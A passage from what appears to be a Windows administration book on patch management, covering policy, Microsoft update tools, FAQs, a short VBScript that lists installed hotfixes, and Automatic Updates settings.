+management policy might be that critical or important patches
+should be applied immediately, while moderate or low patches
+
+should be submitted to a team member for further study. Another
+example is proactively scheduling a specific day of the week or
+month for installing patches (usually weekends, in case
+something breaks), as opposed to the drop-everything, the-sky-
+is-falling approach common in a reactive environment. Making a
+decision tree that addresses these issues ahead of time reduces
+anxiety and speeds response when the time comes to patch
+something.
+Process
+The detailed procedure you will use to respond to vulnerabilities
+and deploy patches should be explicit within your security
+policy. In this regard, we have some help from Microsoft, which
+recommends following a six-step process.
+1. Notification
+Information comes to you about a vulnerability, including
+a patch meant to eliminate it. Notification might be sent
+via email from the Microsoft Security Notification
+Service, a pop-up balloon when you're using Automatic
+Updates, a message displayed in the Software Update
+Services (SUS) web console, or some other method. It
+all depends on which tools you use to keep your
+systems patched and up-to-date (we'll summarize these
+tools in a moment).
+2. Assessment
+
+Based on the patch rating and the configuration of your
+systems, you need to decide which systems need the
+patch and how quickly they need to be patched to
+prevent an exploit. Obviously, having an accurate
+inventory of systems and applications running on your
+network is essential if you want to keep your network
+secure against intrusion.
+3. Obtainment
+How you get the patch you need depends on which
+patch-management tools you choose to deploy. In
+general, such tools range from completely manual (e.g.,
+visiting the Windows Update web site) to almost entirely
+automatic (e.g., via Automatic Updates or SUS). Like
+everything in security, there is a tradeoff: the manual
+approach is slower, but it gives you more control.
+4. Testing
+Testing should always take place before you apply
+patches to production systems. Test your patches on a
+testbed network that simulates your production network.
+Remember that Microsoft can't test all possible effects
+of a patch before releasing it, because there are
+thousands of applications that can run on servers and
+millions of combinations of applications. So, make sure
+you test patches before deploying them, especially if
+you have custom code running on your machines. If you
+need a way to justify the cost of purchasing duplicate
+equipment for a testbed network, tell the boss it's like
+insurance.
+
+5. Deployment
+Deploy a patch only after you've thoroughly tested it.
+You are then ready to apply it, but do so carefully. Don't
+apply it to all your systems at once, just in case your
+testing process missed something. A good approach is
+to apply patches one at a time, testing your production
+servers after each patch is applied to make sure
+applications still function properly. That's the problem
+with security roll-ups: by combining several fixes into a
+single package, the probability of a patch going wrong
+and breaking something is multiplied. Again, it's a
+tradeoff: roll-ups speed up patch deployment but give
+you less control over the result. Fortunately, even a tool
+like Automatic Updates can be hacked to apply one
+patch at a time [Hack #86].
+6. Validation
+This final step in the process is often forgotten: making
+sure that the patch has actually been installed on the
+targeted systems. Fortunately, there are tools available
+to scan your network to see whether your systems are
+properly patched by looking for changes in the server's
+filesystem and Registry to verify that a patch has been
+installed properly (see [Hack #80])
+As far as notification is concerned, never
+install a patch that is attached to an email
+message purportedly sent to you by
+Microsoft. Microsoft doesn't send out
+
+patches by email (it sends out notification
+bulletins only). Such attachments are
+most likely spam or possibly even viruses,
+so don't open them!
+Persistence
+Policies are useless and processes are futile unless you persist
+in applying them consistently. Network security requires
+constant vigilance, not just because of the new vulnerabilities
+and patches that appear almost daily, but also because new
+tools are constantly being developed to handle the growing
+problem of keeping systems patched. At the time of this writing,
+Microsoft's whole patch-management strategy is in a state of
+flux.
+So, we are on the horns of a dilemma. If you assert that
+Microsoft is responsible for ensuring that Windows systems are
+patched and up-to-date, then you should agree that Microsoft
+should have the right to package their products with automatic
+patching turned-on, so that patches are downloaded and
+installed automatically whether or not administrators want them.
+However, most administrators won't agree to this, because they
+want to maintain control and don't trust Microsoft. In that case,
+you should agree that the administrators who deploy and
+configure Windows systems should be considered responsible
+
+for keeping them patched properly.
+Unfortunately, incidents like the Slammer worm, which
+propagated using unpatched Microsoft SQL 2000 servers,
+clearly indicate that not all administrators act responsible when
+it comes to keeping their systems up-to-date with patches. To
+be fair, though, poorly patched systems are not always the fault
+of administrators; sometimes, they are the fault of tight-fisted
+CEOs who refuse to budget adequate funds for hiring IT staff or
+procuring patch-management tools and test systems.
+The point is that if Microsoft can't control the patching process,
+then it's pushed back onto the users. And a few irresponsible
+users can wreak havoc on the systems of responsible ones
+through the flood of worm traffic they unleash through their
+unpatched systems. Responsible users then cry out, "Microsoft
+should stop this from happening!," when perhaps they should be
+suing the companies that don't keep their systems properly
+patched.
+I might add another P here for Practice.
+Once you've developed your patch-
+management policy, you should
+periodically have your staff practice the
+procedures so that the procedures become
+second nature. Mind you, with the number
+of patches coming out of Redmond these
+days, who needs to practice?
+
+Patch-Management Tools
+Once you have a policy in place and have outlined a detailed
+process for handling patches, what tools can you use to deploy
+patches to your systems? Once again, various tradeoffs are
+involved, including power versus simplicity and risk versus
+control. Here's a quick summary of what's currently available
+from Microsoft.
+Windows Update
+The granddaddy of all patch-management tools, Windows Update
+is a web site (http://windowsupdate.microsoft.com) that allows
+users to scan their computers manually to see which hotfixes,
+roll-ups, or service packs need to be installed. Windows Update
+also offers add-ons and enhancements that Microsoft develops
+for Windows.
+The advantage of this approach is that users have complete
+control over which patches are installed on their system. The
+disadvantages, however, are numerous. First, your computer
+must be connected to the Internet, which is where most threats
+come from. Second, you must have cookies enabled; there goes
+your privacy, some might say. Third, you must allow ActiveX
+controls to run, which is another potential source of vulnerability.
+Finally, you must be a member of the local administrators group
+when you use Windows Update. This one is serious; in a
+corporate environment, it means you have to give employees
+administrative privileges so that they can keep their machines
+up-to-date.
+
+Clearly, Windows Update is suited only for small offices and
+home networks as a patch-management solution.
+Automatic Updates
+Starting with Service Pack 3 for Windows 2000, Microsoft
+includes a feature called Automatic Updates on all subsequent
+versions of Windows. This feature has some of the security
+weaknesses of the Windows Update approachnamely, your
+machines must be connected to the Internet and Internet
+Explorer must be configured to allow ActiveX controls to run. But
+on the plus side, Automatic Updates doesn't require that users
+have administrative privileges, as Windows Update does. The
+main advantage of Automatic Updates is that it enables
+systems to download new patches automatically when they
+become available on the Windows Update web site and install
+them according to a schedule the administrator can specify. For
+more information on how this tool works, see [Hack #86].
+Software Update Services (SUS)
+The Software Update Services (SUS) tool is available as a free
+download from Microsoft and takes Automatic Updates several
+steps further. Instead of requiring each system to be connected
+to the Internet, SUS downloads and stores patches on one or
+more SUS servers, where administrators can review them and
+either approve or decline their installation. Client computers
+then have their Automatic Updates component configured to
+point toward the SUS servers instead of the Windows Update
+
+web site as the source for their patches. This approach has all
+the advantages of Automatic Updates, without the
+disadvantages of requiring every machine to be exposed to the
+Internet.
+SMS Software Update Services
+Feature Pack
+At the high end of things is Microsoft Systems Management
+Server (SMS), a powerful but complex tool for deploying,
+configuring, and maintaining large numbers of systems. The SUS
+Feature Pack enables SMS to leverage SUS technology to
+determine which systems need which patches, push the patches
+out and install them, and report the results. The Feature Pack
+gives you more granular control than SUS over which systems
+receive which patches, lets you build an inventory of installed
+patches for each system, has better reporting tools, and
+overcomes SUS's limitation of 15,000 client computers (though,
+in reality, SUS starts to become unmanageable around 5,000
+clients). For further information, see
+http://www.microsoft.com/smserver/downloads/20/featurepacks/suspack/
+Third-party tools
+Finally, there are a number of third-party patch-management
+tools available. GFI LANguard Network Security Scanner
+(N.S.S.) from GFI (http://www.gfi.com/) is a good one. In addition
+to identifying and deploying patches each system needs, N.S.S.
+
+can also scan for other vulnerabilities, such as weak password
+policies and ports that shouldn't be open, and inform you how to
+harden your systems better. There are also other patch-
+management systems available from third-party vendors; a
+quick search on Google will turn up several.
+
+Hack 80 Beginners Guide to Enterprise
+Patch Management
+Here's another take on managing the patch-management cycle
+effectively in a large enterprise environment, written by an
+expert on the subject.
+One of the most heated and wildly debated subjects in many
+organizations today is the subject of desktop security. When
+large IT organizations have an enterprise product like Systems
+Management Server (SMS) deployed, security teams usually
+push to the desktop teams the task of ensuring that the latest
+security updates released by Microsoft are installed. This
+means that the responsibility of ensuring that a high percentage
+of clients in the environment are patched rests on the shoulders
+of desktop support personnel members or SMS team members.
+In order to better distribute this responsibility, it's best to
+understand the functionality that can be extended in the
+following steps:
+1. Identify vulnerable systems
+Assess the business impact of patching
+Package patches for distribution
+
+Test patches
+Evaluate successes and failures
+Finish up
+Before we discuss each of these steps in detail, if you are
+currently looking to evaluate which tools would be best for your
+organizations patch-management strategies, take a look at
+these helpful links from Microsoft's two heaviest hitters:
+Patch Management Using Microsoft Software Update Services
+http://www.microsoft.com/technet/treeview/default.asp?
+url=/technet/itsolutions/msm/swdist/pmsusog.asp
+Patch Management Using Microsoft Systems Management Server
+http://www.microsoft.com/technet/treeview/default.asp?
+url=/technet/itsolutions/msm/swdist/pmsmsog.asp
+Identifying Vulnerable Systems
+SMS stands out from SUS the most in its ability to report on the
+current client state. In the past, SMS_DEF.MOF updates
+accomplished this by pulling data from the Registry in
+HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\HotFix and
+basing distributions on that data. However, with the advent of the
+
+SUS Feature Pack for SMS (SUSFP), this is no longer necessary.
+A more robust security hotfix and reporting mechanism can now
+be added to your infrastructure. Installed and missing updates
+are reported through normal SMS inventory, so collections and
+queries can be based on of this information. Microsoft also
+supplies a web-based reporting package with built-in reports to
+give high-level overviews of an organization's patch state. The
+job of an IT administrator to manage the environment will be
+significantly easier if she is able to view which updates are
+already installed and which are a priority to be deployed.
+Assessing the Business Impact of
+Patching
+The business impact of patching is mostly comprised of
+developing patch distribution schedules and policies. Each
+company's needs are different and patch distribution should
+conform to those specific needs. Many desktop IT divisions let
+mandates from their security teams determine when and how
+patches should be deployed; generally, this causes more harm
+than good. Do your customers have schedules to meet as well?
+Shipping dates for when the product must be out the door? What
+if you send a package with 10 critical system updates to 100
+workstations? Problems might occur through no fault of your
+own, no matter how much testing is done prior to deployment.
+Optimal success is gained by talking to your customer base to
+determine the best dates for distribution. If a major product
+order is being shipped on the 15th, you should probably wait
+until the 20th to send out updates.
+What, then, guarantees the least amount of interruption to users,
+while still ensuring success? Most of the time, this is
+encapsulated in your company's workstation reboot policy. If
+
+most IT administrators had their druthers, every workstation
+would get restarted on a daily basis or the administrators would
+be allowed to force system restarts whenever they want to
+during distributions. But in the real world, especially for
+engineering or R&D-driven companies, this is not a reality. Even
+if you are using the SUS Feature Pack (SUSFP) to give your user
+base the ability to install their updates early, it is still difficult to
+manage workstations that might not get logged onto for weeks at
+a time or workstations that run test simulations and cannot get
+restarted even while a distribution is happening. There is no
+easy answer to this, and many different internal solutions have
+been developed by various organizations. If you are faced with
+this dilemma and are not able to use the built-in tools (such as
+the SUSFP), the best option is to speak with other members of
+the IT community in forums, newsgroups, or mailing lists and
+learn which methods they use to overcome this problem.
+However, it is crucial to keep two ideas in mind: the impact to
+your user base and whether the solution still ensures successful
+installation.
+Packaging Patches for Distribution
+If your organization is already using the SMS SUS Feature
+Pack's patch-installation agent (i.e., the Distribute Software
+Updates Wizard functionality) for distribution, you can pretty
+much ignore this section because everything you need is
+already done for you. Microsoft has developed a common
+template in the SUSFP that consistently applies patches in a
+safe fashion, so the SMS administrator no longer needs to
+perform constant scripting. Most companies using SMS that
+have not made the transition to SUSFP to distribute patches
+haven't done so either because their organizations have either
+specific user-base needs (such as workstations in labs that
+
+might go long periods without being looked at) or a scattered
+hierarchy of sites and multiple administrators that would need to
+replicate the same settings repeatedly (this scenario introduces
+an increased possibility for human error, along with other
+issues).
+If you decide to write your own package to suit your company's
+needs, make sure you perform the following major steps in your
+code repeatedly for each patch:
+1. Determine if the patch is already present by checking
+for a Registry key's existence, file version, and so on.
+You'll spend a lot of time reading through Microsoft
+security bulletins to figure out which data to look for.
+Detect which operating system your package is running on
+and install the correct version of that patch for each bulletin.
+Verify successful installation by again checking for a
+Registry key's existence, file version, and so on. But this time
+you will need to code in failure messages (MIFs for SMS) and
+logging so that you can troubleshoot issues that might arise
+later.
+QChain the patches. Many people forget to do this step.
+This process is a simplified flow of what needs to be done for a
+solid patch-distribution package. It might look easy at first
+glance, but when you are dealing with over 15 hotfixes, the
+package size can grow quite considerably, and the time the
+administrator spends coding and working out bugs greatly
+increases as well. In the past, packages that do just these
+simple tasks have been known to grow to a few thousand lines of
+
+code!
+It's easy to see why using the SUSFP Patch Installation agent
+would make an SMS administrators job easier, since these steps
+are already done. Proper hotfix command-line switches are
+really all you need to research.
+Testing Patches
+Proper testing procedures should be at the foundation of every
+software distribution, regardless of weather they are hotfixes.
+Your company's client base might have any number of different
+configurations that could effect distribution. I won't discuss
+package testing in detail here, because entire books can be
+written on the subject, but I will add a couple of notes.
+First, test the patch in its raw installer form from Microsoft to
+eliminate any chance of causing problems on the system. Next,
+when testing configurations on workstations that are designated
+for testing, do the majority of your tests via SMS once you are
+confident that the package functions correctly. Many problems
+can be uncovered when distributing via SMS. Because the
+majority of your enterprise will execute the installation in this
+method, the majority of your testing should mirror that use.
+Also, note that there is no substitute for beta testers among your
+customer base. Not only will you get more feedback if a problem
+arises, but they are also using the tools that could be affected.
+Finally, base distributions on testing; don't base testing on
+distributions
+Evaluating Successes and Failures
+
+Verifying that the client base is up-to-date after distribution
+might be the most important phase in this entire process.
+Managing the patch state in your enterprise will never be
+finished as long as there is person out there who is smarter than
+the Microsoft developers, which is why companies need to patch
+in the first place. Unfortunately, many organizations distribute an
+update and never look at reports to make sure that a high-
+enough percentage of machines are updated. If your
+infrastructure is functioning properly, the reporting methods you
+used earlier to identify vulnerable systems (such as the SUSFP)
+should show that the patch-installation state is higher after
+distribution. If this is not the case (if installations are failing but
+notifications of the failure are not sent back to the IT
+administrator), you will need to look into either your reporting
+mechanism or your packaging technique.
+Finishing Up
+Thoroughness and attention to detail are the most important
+aspects to managing a company's patch state. Although there
+are many delivery machines (such as SMS) that can be used to
+apply patches to your workstations, the same basic premises
+should be followed throughout the entire process. Even in this
+heightened time of hacking, viruses, and worms, a solid patch-
+management process and attentive IT administration can avoid
+almost any vulnerability by actively keeping workstations' patch
+state updated.
+Do some research on Microsoft patch release dates and
+virus/worm release dates. You'll find that in almost every
+instance a patch has been released far ahead of time. When
+administrators fail to apply these updates, frantic patching is
+often required when an attack happens. Do you and your
+
+customers a favor: avoid these emergencies by having a stable
+enterprise patch-management solution in place.
+See Also
+Here is a brief list of useful links on different aspects of
+enterprise patch management:
+Security bulletin email notifications
+(http://www.microsoft.com/security/security_bulletins/decision.asp
+White paper on improving patch management
+(http://www.microsoft.com/security/whitepapers/patch_management.asp
+Security policy, assessment, and vulnerability analysis
+(http://www.microsoft.com/technet/treeview/?
+url=/technet/security/topics/assess/)
+Choosing a security update management solution
+(http://www.microsoft.com/windows2000/windowsupdate/sus/suschoosing.asp
+How the SMS Software Update Services Feature Pack
+works
+(http://www.microsoft.com/smserver/techinfo/administration/20/using/suspackhowto.asp
+Windows patch-management tools
+(http://www.nwfusion.com/reviews/2003/0303patchrev.html
+
+BigFix (http://www.bigfix.com/website/index.html)
+Shavlik (http://www.shavlik.com)
+Richard Threlkeld
+
+Hack 81 Patch-Management FAQ
+Rod Trent of myITforum.com shares his answers to some
+frequently asked questions on the subject of patch
+management.
+As CEO of myITforum.com (http://www.myitforum.com) and
+author of white papers and articles on patch management, I
+frequently get questions on different technical aspects of
+deploying patches for Microsoft platforms. Here is a selection of
+some common questions and my answers. You can find
+additional entries in the Patch Management FAQ at
+myITforum.com.
+Downloadable Security Updates
+Q: Can hotfixes be downloaded from Microsoft without using
+Windows Update or SUS?
+A: You can download the hotfixes via the Windows Update
+Catalog, TechNet/Security Bulletin Search, and the Microsoft
+Download site.
+To download them using the Windows Update Catalog,
+first add a Windows Update Catalog link to your Windows
+
+Update page. This gives you quick access to download
+updates manually from the Windows Update Catalog. Go
+to the Windows Update Web site
+(http://windowsupdate.microsoft.com) and click
+Personalize Windows Update. Then select the checkbox
+labeled "Display the link to the Windows Update Catalog
+under See Also" and click the Save Settings button.
+To use the Microsoft TechNet/Security Search feature,
+simply go to
+http://www.microsoft.com/technet/security/current.asp.
+Finally, you can download hotfixes from the Microsoft
+Download Center at
+http://www.microsoft.com/downloads/.
+Article and Bulletin Search
+Q: Where can I search for a specific Microsoft security bulletin?
+A: Use the HotFix & Security Bulletin Service at
+http://www.microsoft.com/technet/security/current.asp.
+Email Notification
+Q: How can I be notified when new security patches are available?
+A: You'll want to sign up for the Microsoft Security Notification
+Service at
+http://www.microsoft.com/technet/security/bulletin/notify.asp.
+
+Old Updates
+Q: I went to the original page to download some old updates, but
+they are no longer available to download. How can I access them?
+A: You can manually download and install them using the
+Windows Update Catalog. See http://support.microsoft.com/?
+kbid=323166 for details.
+Updates for Older Operating Systems
+Q: I can get updates from the Windows Update web site for
+Windows XP and Windows 2003. Where can I find updates for earlier
+operating systems?
+A: To obtain updates for earlier operating systems, go to of the
+following links:
+Windows 2000
+(http://www.microsoft.com/windows2000/downloads/)
+For Windows 98
+(http://www.microsoft.com/windows98/downloads/)
+Windows 95
+(http://www.microsoft.com/windows95/downloads/)
+Windows NT 4.0
+
+(http://www.microsoft.com/windowsnt/downloads/)
+MBSA Support
+Q: Is there a support forum specifically for Microsoft Baseline
+Security Analyzer (MBSA)?
+A: Yes. Microsoft provides a newsgroup specifically for MBSA. It
+can be found on the msnews.microsoft.com news server in the
+microsoft.public.security.baseline_analyzer newsgroup. You can
+also access and interact with the newsgroup through the Google
+MBSA News Group Access interface at
+http://groups.google.com/groups?hl=en&lr=&ie=UTF-
+8&safe=off&group=microsoft.public.security.baseline_analyzer.
+Rod Trent
+
+Hack 82 Enumerate Installed Hotfixes
+Here's a script you can use to list all hotfixes installed on a
+machine.
+Ever wish you could quickly and easily look at a computer and
+find out which hotfixes were installed, when they were installed,
+and by whom? Here is a sample script that shows you how to
+accomplish this; if you know VBScript and WMI, you can
+customize it further as necessary. This script will enumerate the
+installed hotfixes on a computer and display the output in a
+message box.
+The following items will be displayed about each installed patch:
+the name of the computer on which the hotfix is installed, the
+description of the hotfix, the hotfix ID, the installation date, and
+who installed the hotfix.
+The Code
+Type the following code into Notepad (with Word Wrap disabled)
+and save it with a .vbs extension as EnumerateHotfixes.vbs:
+strComputer = "."
+Set objWMIService = GetObject("winmgmts:" _
+
+& "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")
+Set colQuickFixes = objWMIService.ExecQuery _
+("Select * from Win32_QuickFixEngineering")
+For Each objQuickFix in colQuickFixes
+Wscript.Echo "Computer: " & objQuickFix.CSName & vbCrlf &_
+"Description: " & objQuickFix.Description & vbCrlf &_
+"Hotfix ID: " & objQuickFix.HotFixID & vbCrlf &_
+"Installation Date: " & objQuickFix.InstallDate & vbCrlf &_
+"Installed By: " & objQuickFix.InstalledBy & vbCrlf
+Next
+Running the Hack
+Open a command prompt, change to the directory in which the
+script is located, and type cscript.exe EnumerateHotfixes.vbs.
+Figure 9-1 shows sample output from running the script.
+Figure 9-1. Enumerating hotfixes on a Windows
+2000 machine
+
+To ensure the script works properly, make sure you have the
+latest scripting engines on the workstation from which you run
+this script. You can download the latest scripting engines from
+the Microsoft Scripting home page
+(http://msdn.microsoft.com/scripting/). Also, since the script
+uses the Active Directory Services Interface (ADSI), you must
+have the same applicable rights you need to use the built-in
+administrative tools.
+Hans Schefske
+
+Hack 83 Apply Patches in the Correct
+Order
+Deploying patches properly can sometimes mean applying them
+in the right order, as this experience can testify.
+There is a specific order you should follow when applying
+Microsoft security patches. Microsoft's policy (a little
+understated) is that you need apply patches in the order in which
+they are released. Understanding Microsoft's naming convention
+for security patch releases is definitely critical for you to
+understand patch order. See the article at
+http://www.myitforum.com/articles/20/view.asp?id=5894 to
+understand the security patch naming convention.
+What could happen if you patch out of order? Microsoft's patches
+are released with the assumption you have a patch-management
+policy in place and that you have applied all patches to date. So,
+when they develop the next patch, they also assume that the
+system to which you will apply the latest patch release has the
+proper file versions.
+If you apply the patches out of order, you can effectively
+overwrite a secure file. For example, say the RPC DCOM worm is
+patched by using MS03-026. If you have this patch, you will not
+be affected by the worm. But if you apply MS03-010 after you
+apply MS03-026, a secure DLL will be overwritten with an
+insecure one, reopening the vulnerability that MS03-026
+patches.
+
+Why would someone do this, you might ask? The RPC DCOM
+worm was something you couldn't get away from. The
+Department of Homeland Security issued warnings, Microsoft
+issued warnings, and the warning was blasted all over TV and
+Internet. This woke up a bunch of system administrators, so
+they patched with MS03-026. And, since they were patching,
+they might as well get the other patches they had missed up to
+that point, applying MS03-010 after the fact.
+So, make sure that you are apply your patches in the order in
+which they are released. If you have some catching up to do,
+take the extra time to get it right!
+Rod Trent
+
+Hack 84 Windows Update FAQ
+Rod Trent of myITforum.com shares his answers to some
+frequently asked questions regarding Windows Update.
+Windows Update is a simple solution that can be used to keep
+individual systems up-to-date with patches released by
+Microsoft. Despite its simplicity, however, not everything about it
+is obvious and I often get questions about different aspects of
+how it works. Here is a selection of some of these questions and
+my answers. For more entries in the Windows Update FAQ, see
+my column at myITforum.com (http://www.myitforum.com).
+Windows Update Information Collection
+Q: I'm worried about privacy. What information does the Windows
+Update site collect when I access the site?
+A: Windows Update is committed to protecting your privacy. To
+provide you with the appropriate list of updates, Windows Update
+must collect a certain amount of configuration information from
+your computer. None of this configuration information can be
+used to identify you. This information includes the operating-
+system version number, Internet Explorer version number,
+version numbers of other software for which Windows Update
+provides updates, Plug and Play ID numbers of hardware
+devices, and Region and Language settings.
+
+The configuration information collected is used only to determine
+the appropriate updates and to generate aggregate statistics.
+Windows Update does not collect your name, address, email
+address, or any other form of personally identifiable information.
+Windows Update also collects the Product ID and Product Key
+to confirm that you are running a licensed copy of Windows. A
+licensed copy of Windows ensures that you will receive ongoing
+updates from Windows Update. The Product ID and Product Key
+are not retained beyond the end of the Windows Update session.
+To provide you with the best possible service, Windows Update
+also tracks and records how many unique machines visit its site
+and whether the download and installation of specific updates
+succeeded or failed. In order to do this, the Windows operating
+system generates a Globally Unique Identifier (GUID) that is
+stored on your computer to uniquely identify it. The GUID does
+not contain any personally identifiable information and cannot be
+used to identify you. Windows Update records the GUID of the
+computer that attempted the download, the ID of the item that
+you attempted to download and install, and the configuration
+information listed previously.
+Personalizing Critical Updates
+Q: On the Windows Update web site, I'd rather not see certain
+updates, but the web site won't let me personalize them. Is
+something wrong?
+A: You cannot use the Personalize button to personalize Critical
+Updates. If you click Personalize, you will receive a message
+that states that the Critical Update section cannot be
+personalized. Sorry!
+
+Clearing the Secure Sockets Layer
+Q: Windows Update fails when I try to use it. What can I do?
+A: If the Windows Update site fails, one of the steps to fixing the
+problem is to clear the Secure Sockets Layer. Open Internet
+Explorer, on the Tools menu, click Internet Options, and then
+click the Content tab. Then, under Certificates, click Clear SSL
+State. Click OK when you receive the message that the SSL
+cache was successfully cleared.
+Another thing to check is your firewall configuration; TCP port
+number 443 (https) needs to remain open for access to the
+Windows Update web site to work. To make sure this port is
+open, type https://www.microsoft.com:443 in your web-browser
+address line and click Go. If you are unable to access the
+Microsoft web site by using this address, you need to open the
+port on the company firewall (or personal firewall, depending on
+your networking environment).
+Removing Items from Your Windows
+Update List
+Q: How do I remove items from the Product Catalog list?
+A: To personalize your available updates, you can remove items
+from the Product Catalog list on the Windows Update web site.
+First, connect to the Windows Update site
+(http://windowsupdate.microsoft.com) and click Product
+Updates. Then, click Personalize and clear the checkbox next to
+the items that you do not want to see listed in the Product
+Catalog. Click Update to save the changes.
+
+Changing Windows Update Schedule
+Q: I've tried to modify the schedule for updates, but as soon as the
+computer is rebooted, the settings revert back to the default.
+A: If you try to change the Critical Update Notification settings
+by using the Task Scheduler and restarting your computer, your
+changes will not be saved. This behavior occurs because, by
+design, you cannot modify or disable the Windows Critical
+Update Notification schedule through the Task Scheduler. Once
+the computer is rebooted, the Registry or local GPO settings
+reset the schedule.
+Manually Installing the Windows Update
+Controls
+Q: What can I do if the ActiveX controls I downloaded and installed
+from the Windows Update site become corrupt?
+A: You might need to install the controls manually. You can do
+this by downloading, extracting, and installing the controls from
+the Windows Update web site.
+Where you obtain these controls depends on the version of
+Windows you have. For Windows 98 and ME, download the
+controls from
+http://v4.windowsupdate.microsoft.com/cab/x86/ansi/iuctl.cab.
+For Windows 2000, XP, or 2003, download the controls from
+http://v4.windowsupdate.microsoft.com/cab/x86/unicode/iuctl.cab
+After downloading the controls, save the .cab file to its own
+directory. Then, right-click on the .cab file and choose to extract
+
+the files. You can extract the files to the same directory you
+created to house the .cab file. Finally, right-click the iuctl.inf file
+and click Install.
+Rod Trent
+
+Hack 85 Obtain Updates via the
+Windows Update Catalog
+Whether you use it to download patches or driver updates, the
+Windows Update Catalog can be your friend.
+The Windows Update Catalog provides a comprehensive list of
+updates that can be distributed over a corporate network. It is a
+one-stop location for Windows updates, fixes, and
+enhancements, as well as Designed for Windows Logo device
+drivers.
+To obtain updates from the Windows Update Catalog, first select
+a category (see Figure 9-2). The Microsoft Windows category
+has updates and fixes for all Windows operating systems, from
+Windows 98 to Windows XP and the Windows Server 2003
+family. The hardware drivers category provides you with driver
+updates for many of the devices on your network.
+Figure 9-2. Downloading updates using the
+Windows Update Catalog
+
+Now, set your search criteria to find the updates you need.
+Finally, download your selected updates to the location of your
+choice (e.g., your local hard drive, a server share on your
+network, or a disk).
+Now, let's dig a little deeper into how to use the Catalog
+effectively.
+
+Adding the Windows Update Catalog to
+Windows Update
+One of the ways you can customize Windows Update is to add a
+link to the Windows Update Catalog. This gives you quick
+access to download updates manually from the Windows Update
+Catalog. First, go to the Windows Update web site
+(http://windowsupdate.microsoft.com) and click Personalize
+Windows Update. Now, click to select the "Display the link to the
+Windows Update Catalog under See Also" checkbox. Finally,
+click Save Settings. You now have a link to the Windows Update
+Catalog when you visit Windows Update.
+Downloading Windows Updates from the
+Windows Update Catalog
+To download updates for Windows for managed deployment in
+your organization, first go to the Windows Update Catalog at
+http://v4.windowsupdate.microsoft.com/catalog/, or use the
+custom link you added to your Windows Update page in the
+previous section. Then, click "Find Microsoft Windows updates"
+or "Find updates for Microsoft Windows operating systems."
+Click the appropriate operating system and language for the
+update that you want to download, and then click Advanced
+Search Options to refine your query. Click Search, and then click
+the appropriate category for the update you want to download
+(e.g., Updates and Service Packs) and locate the update. Click
+Add.
+Repeat the previous steps to find and add additional updates to
+your download basket. Then, click "Go to download basket." In
+
+the "Type or browse to the download location of your choice"
+box, type the full path for the folder in which you want to save the
+patch, or click Browse to locate the folder. Click Download Now,
+and then click Accept to accept the license agreement.
+Distribute your updates and install them on your machines.
+Downloading Driver Updates from the
+Windows Update Catalog
+If you need updated device drivers, the Windows Update Catalog
+is the place to get them. To download manufacturer hardware
+drivers from the Windows Update web site, go to the Windows
+Update Catalog at
+http://v4.windowsupdate.microsoft.com/catalog/ or use the
+personalized link you created previously. Click "Find hardware
+driver updates" or "Find driver updates for hardware devices."
+Then, click the appropriate hardware category for the driver
+update you want to download. Click the manufacturer name, the
+operating system, the language, and any other items that you
+want to search for, and then click Search. Locate the driver you
+want, and then click Add.
+Repeat the previous steps to find and add additional driver
+updates to your download basket and click "Go to download
+basket." In the Type or "browse to the download location of your
+choice" box, type the full path for the folder in which you want to
+save the patch, or click Browse to locate the folder. Click
+Download Now, and then click Accept to accept the license
+agreement.
+You can now install the downloaded drivers or distribute them to
+machines that need them on your network.
+
+Rod Trent
+
+Hack 86 Use Automatic Updates
+Effectively
+Automatic Updates is an easy way to ensure that your Windows
+servers are properly patched against critical vulnerabilities, but
+there are some nuances to using it effectively.
+The other day, a power blackout temporarily knocked out my
+company's servers. I should have tested the UPS more often,
+but you know how it is. Anyway, when the power came back on,
+the servers rebooted. I was sitting at the console of one of them,
+about to log on, when the server suddenly rebooted itself again.
+Virus? Disk problem? I stared at the screen, worried for a
+moment, and then suddenly realized: Automatic Updates!
+Whew!
+Automatic Updates is a patch-management feature that
+replaces the earlier Critical Update Notification utility that you
+used to download from Microsoft's web site for Windows 98 or
+later. Microsoft first made Automatic Updates available for
+download for Windows 2000 systems running Service Pack 2.
+Later, when Service Pack 3 was released, Automatic Updates
+was included as a component of that service pack. Automatic
+Updates is also included on both the Windows Server 2003 and
+Windows XP platforms. Automatic updates lets administrators
+schedule the automatic downloading and installation of critical
+security updates from Microsoft's Windows Update web site,
+making it no longer necessary for administrators to use Windows
+Update to keep their systems patched manually.
+
+Using Automatic Updates
+The way you configure Automatic Updates depends on your
+platform. On Windows Server 2003 and Windows XP Service
+Pack 1, use Control Panel System and select the Automatic
+Updates tab. On Windows 2000 Service Pack 3 or later, use
+Control Panel Automatic Updates.
+Whichever platform you use, the configuration options are the
+same. Figure 9-3 shows the configuration options for Windows
+Server 2003.
+Figure 9-3. Automatic Updates feature in
+Windows Server 2003
+
+The checkbox lets you enable or disable Automatic Updates on
+the machine. By default, Automatic Updates is enabled and the
+
+second option under Settings is selected. The three Settings
+options represent different levels of automation.
+The first option"Notify me before downloading any updates and
+notify me again before installing them on my computer"is the
+least automated solution. Windows automatically checks the
+Windows Update web site for new updates shortly after system
+startup and every 22 hours thereafter (minus a random offset of
+up to 5 hours). If new updates are available for download, a
+notification message appears above the status area at the
+bottom right of the logged-on user's desktop. However, only
+administrators can download and install these updates.
+If the second option"Download the updates automatically and
+notify me when they are ready to be installed"is selected,
+Windows automatically checks for new updates according to the
+scheduled described previously. But this time, if updates are
+found, they are automatically downloaded in the background.
+Once downloading is complete, a notification message asks if
+you want to install them.
+The third option"Automatically download the updates, and install
+them on the schedule that I specify"is the most automated
+solution for keeping your system up-to-date with critical
+security patches. Windows still checks for new updates
+according to the previously described schedule, but it then
+allows you to schedule when downloaded updates should be
+automatically installed. You can schedule installation of updates
+every day or once a week at a time of your choosing (the default
+time, 3:00 a.m., is a good choice, because system and user
+activity is usually low then).
+What actually happens when the scheduled time arrives
+depends. If a user is logged on at the scheduled installation
+time, a notification message gives the user five minutes to log
+off before installation starts. By default, the machine reboots
+
+when these five minutes are up, but this behavior can be
+changed by editing the Registry (we'll see how in a moment). On
+the other hand, if the user is an administrator, he has the option
+of declining installation until the next scheduled day and time. If
+no one is logged on to the machine, the updates are installed
+automatically and, if necessary, the machine reboots (this is
+usually the case). Finally, if the machine is down when the
+scheduled time occurs, installation of updates commences
+approximately one minute after the machine finishes booting
+(this time interval can also be changed only by editing the
+Registry).
+If you choose one of the first two methods, a list of available
